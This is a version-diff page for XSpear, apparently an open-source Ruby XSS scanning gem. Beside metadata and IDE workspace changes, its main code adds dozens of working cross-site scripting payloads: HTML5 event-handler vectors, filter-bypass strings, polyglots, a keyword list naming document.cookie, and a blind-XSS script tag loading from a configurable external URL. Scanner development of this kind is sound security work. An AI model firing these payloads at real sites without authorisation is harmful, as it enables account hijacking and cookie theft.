XSpear 1.0.7 → 1.0.8

Sign up to get free protection for your applications and to get access to all the features.
Files changed (6) hide show
  1. checksums.yaml +4 -4
  2. data/.idea/workspace.xml +28 -24
  3. data/README.md +2 -2
  4. data/lib/XSpear/version.rb +1 -1
  5. data/lib/XSpear.rb +52 -3
  6. metadata +2 -2
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 0c0ac315484162b92f2f958d2ddc70736bec0f164349575529e763f154366c37
4
- data.tar.gz: eab6a1c2350ea1bf4467fcd41cfd00a61c58d1693503e4437ae86418e348bda1
3
+ metadata.gz: 6921327dc742a1fe07a1daf76f20272a50f5fc6d8ecd73bf4f2ef9eed6d0d98d
4
+ data.tar.gz: 3344443259fa53fe61fc57baefed0f81891e8badd048c9098c4c69a8b33ea1fe
5
5
  SHA512:
6
- metadata.gz: e4463bb21d6b1cf918c290d7a3540d93510f4f9cb68ebc6fad7319377d579228aa754b832e5d077f63e24b35d2ea73fa492a4a21351c0f26880b6c1f52065016
7
- data.tar.gz: bf64aa0df617fdddfb8d07803a8dbba0bb2822579b56fbc93a0d17f73aced699ad2f46bfd01a51ae9e614d3287b016e2419eaba35384e17d76c038c3ea52d567
6
+ metadata.gz: da21a77b8132168cf8068f7cde102b4dac72d332db5a62f75fff701d258ef3e636fdcabfaabee1ecc159f5b7fb5223b86016ce59264fdee6a104b1f6725d01da
7
+ data.tar.gz: c1bcef3a187eef64530b717527316f6f674387de7eda895fa6420c6e3de5d0eff103ac9ef359162cc89c9d91a77f12af6c8d7ad47e857b5632794ce8eeb50f53
data/.idea/workspace.xml CHANGED
@@ -3,10 +3,7 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
7
6
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
9
- <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
10
7
  </list>
11
8
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
12
9
  <option name="SHOW_DIALOG" value="false" />
@@ -36,20 +33,20 @@
36
33
  <provider selected="true" editor-type-id="text-editor" />
37
34
  </entry>
38
35
  </file>
39
- <file pinned="false" current-in-tab="false">
36
+ <file pinned="false" current-in-tab="true">
40
37
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
41
38
  <provider selected="true" editor-type-id="text-editor">
42
- <state relative-caret-position="426">
43
- <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
39
+ <state relative-caret-position="381">
40
+ <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
44
41
  </state>
45
42
  </provider>
46
43
  </entry>
47
44
  </file>
48
- <file pinned="false" current-in-tab="true">
45
+ <file pinned="false" current-in-tab="false">
49
46
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
50
47
  <provider selected="true" editor-type-id="text-editor">
51
- <state relative-caret-position="253">
52
- <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
48
+ <state relative-caret-position="-176">
49
+ <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
53
50
  </state>
54
51
  </provider>
55
52
  </entry>
@@ -114,12 +111,12 @@
114
111
  <option value="$PROJECT_DIR$/exe/XSpear" />
115
112
  <option value="$PROJECT_DIR$/README.md" />
116
113
  <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
- <option value="$PROJECT_DIR$/lib/XSpear.rb" />
118
114
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
115
+ <option value="$PROJECT_DIR$/lib/XSpear.rb" />
119
116
  </list>
120
117
  </option>
121
118
  </component>
122
- <component name="ProjectFrameBounds">
119
+ <component name="ProjectFrameBounds" fullScreen="true">
123
120
  <option name="x" value="-1920" />
124
121
  <option name="y" value="-620" />
125
122
  <option name="width" value="1920" />
@@ -230,7 +227,7 @@
230
227
  <workItem from="1562942816004" duration="15337000" />
231
228
  <workItem from="1563638656518" duration="4985000" />
232
229
  <workItem from="1563809961097" duration="4237000" />
233
- <workItem from="1563893538891" duration="3583000" />
230
+ <workItem from="1563893538891" duration="6879000" />
234
231
  </task>
235
232
  <task id="LOCAL-00001" summary="init update">
236
233
  <created>1562945899597</created>
@@ -498,14 +495,21 @@
498
495
  <option name="project" value="LOCAL" />
499
496
  <updated>1563896886094</updated>
500
497
  </task>
501
- <option name="localTasksCounter" value="39" />
498
+ <task id="LOCAL-00039" summary="(1.0.7) Releases 1.0.7 (Modify Format, etc..)">
499
+ <created>1563897379180</created>
500
+ <option name="number" value="00039" />
501
+ <option name="presentableId" value="LOCAL-00039" />
502
+ <option name="project" value="LOCAL" />
503
+ <updated>1563897379180</updated>
504
+ </task>
505
+ <option name="localTasksCounter" value="40" />
502
506
  <servers />
503
507
  </component>
504
508
  <component name="TimeTrackingManager">
505
- <option name="totallyTimeSpent" value="28142000" />
509
+ <option name="totallyTimeSpent" value="31438000" />
506
510
  </component>
507
511
  <component name="ToolWindowManager">
508
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
512
+ <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
509
513
  <editor active="true" />
510
514
  <layout>
511
515
  <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
@@ -521,7 +525,7 @@
521
525
  <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
522
526
  <window_info anchor="bottom" id="Database Changes" order="8" />
523
527
  <window_info anchor="bottom" id="Version Control" order="9" />
524
- <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.29637307" />
528
+ <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34158415" />
525
529
  <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
526
530
  <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
527
531
  <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -534,7 +538,6 @@
534
538
  <option name="version" value="1" />
535
539
  </component>
536
540
  <component name="VcsManagerConfiguration">
537
- <MESSAGE value="edit gem dependency(runtime, developement)" />
538
541
  <MESSAGE value="Add json report and new build binary, edit readme" />
539
542
  <MESSAGE value="Add screenshot images" />
540
543
  <MESSAGE value="Add dependency gems descriptions" />
@@ -559,7 +562,8 @@
559
562
  <MESSAGE value="(1.0.6)[fixed #5] Add blind-xss other pattern" />
560
563
  <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
561
564
  <MESSAGE value="(1.0.6) Edit README.md" />
562
- <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit README.md" />
565
+ <MESSAGE value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
566
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
563
567
  </component>
564
568
  <component name="editorHistoryManager">
565
569
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -629,17 +633,17 @@
629
633
  </state>
630
634
  </provider>
631
635
  </entry>
632
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
636
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
633
637
  <provider selected="true" editor-type-id="text-editor">
634
- <state relative-caret-position="426">
635
- <caret line="181" column="31" lean-forward="true" selection-start-line="181" selection-start-column="31" selection-end-line="181" selection-end-column="31" />
638
+ <state relative-caret-position="-176">
639
+ <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
636
640
  </state>
637
641
  </provider>
638
642
  </entry>
639
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
643
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
640
644
  <provider selected="true" editor-type-id="text-editor">
641
- <state relative-caret-position="253">
642
- <caret line="41" column="29" selection-start-line="41" selection-start-column="29" selection-end-line="41" selection-end-column="29" />
645
+ <state relative-caret-position="381">
646
+ <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
643
647
  </state>
644
648
  </provider>
645
649
  </entry>
data/README.md CHANGED
@@ -134,7 +134,7 @@ __((_)(_)) /(/( /((_))(_))(()\
134
134
  |_| \ /<
135
135
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
136
136
  / \<
137
- \> [ v1.0.6 ]
137
+ \> [ v1.0.7 ]
138
138
  [*] creating a test query.
139
139
  [*] test query generation is complete. [149 query]
140
140
  [*] starting test and analysis. [10 threads]
@@ -297,5 +297,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
297
297
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
298
298
 
299
299
  ## ScreenShot
300
- <img src="https://user-images.githubusercontent.com/13212227/61726530-bf7aff80-adac-11e9-9ed8-ac8ecd358c0c.png" width=100%>
300
+ <img src="https://user-images.githubusercontent.com/13212227/61727892-1681d400-adaf-11e9-832d-37547006f778.png" width=100%>
301
301
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
data/lib/XSpear/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.0.7"
2
+ VERSION = "1.0.8"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -247,6 +247,7 @@ class XspearScan
247
247
  'onKeyUp',
248
248
  'onLayoutComplete',
249
249
  'onLoad',
250
+ 'onloadstart',
250
251
  'onLoseCapture',
251
252
  'onMediaComplete',
252
253
  'onMediaError',
@@ -297,7 +298,10 @@ class XspearScan
297
298
  'onTrackChange',
298
299
  'onUndo',
299
300
  'onUnload',
300
- 'onURLFlip'
301
+ 'onURLFlip',
302
+ 'ontouchstart',
303
+ 'ontouchend',
304
+ 'ontouchmove'
301
305
  ]
302
306
  tags = [
303
307
  "script",
@@ -308,10 +312,11 @@ class XspearScan
308
312
  "audio",
309
313
  "meta",
310
314
  "object",
311
- "embeded",
315
+ "embed",
312
316
  "style",
313
317
  "frame",
314
- "frameset"
318
+ "frameset",
319
+ "applet"
315
320
  ]
316
321
  special_chars =[
317
322
  ">",
@@ -335,6 +340,24 @@ class XspearScan
335
340
  "=",
336
341
  "$"
337
342
  ]
343
+ useful_code = [
344
+ "javascript:",
345
+ "JaVasCriPt:",
346
+ "jaVas%0dcRipt:",
347
+ "jaVas%0acRipt:",
348
+ "jaVas%09cRipt:",
349
+ "data:",
350
+ "alert(",
351
+ "alert`",
352
+ "prompt(",
353
+ "prompt`",
354
+ "confirm(",
355
+ "confirm`",
356
+ "document.location",
357
+ "document.cookie",
358
+ "window.location"
359
+ ]
360
+
338
361
 
339
362
  log('s', 'creating a test query.')
340
363
  r.push makeQueryPattern('s', '', '', 'i', "-", CallbackCheckHeaders)
@@ -357,17 +380,43 @@ class XspearScan
357
380
  end
358
381
 
359
382
  # Check Common XSS Payloads
383
+ onfocus_tags = [
384
+ "input",
385
+ "select",
386
+ "textarea",
387
+ "keygen"
388
+ ]
360
389
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
361
390
  r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
362
391
  r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
392
+ r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
363
393
  r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
394
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
395
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
396
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
397
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
398
+ r.push makeQueryPattern('x', '"\'><meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', '<meter value=2 min=0 max=10 onmouseover=alert(45)>2 out of 10</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
399
+
400
+ onfocus_tags.each do |t|
401
+ r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
402
+ end
403
+
404
+ # Check Selenium Payloads
364
405
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
406
+ r.push makeQueryPattern('x', '"><svg onload=alert(1)>', '<svg onload=alert(1)>', 'v', "triggered "+"<svg onload=alert(1)> (x0c)".red, CallbackXSSSelenium)
365
407
  r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
366
408
  r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
409
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered "+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
410
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered "+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
411
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered "+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
412
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered "+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
413
+
414
+ # Check Selenium Polyglot
367
415
  r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
368
416
  r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
369
417
  r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
370
418
 
419
+
371
420
  # Check Blind XSS Payload
372
421
  if !@blind_url.nil?
373
422
  r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "NOTDETECTED", 'i', "", CallbackNotAdded)
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.0.7
4
+ version: 1.0.8
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-07-23 00:00:00.000000000 Z
11
+ date: 2019-07-24 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize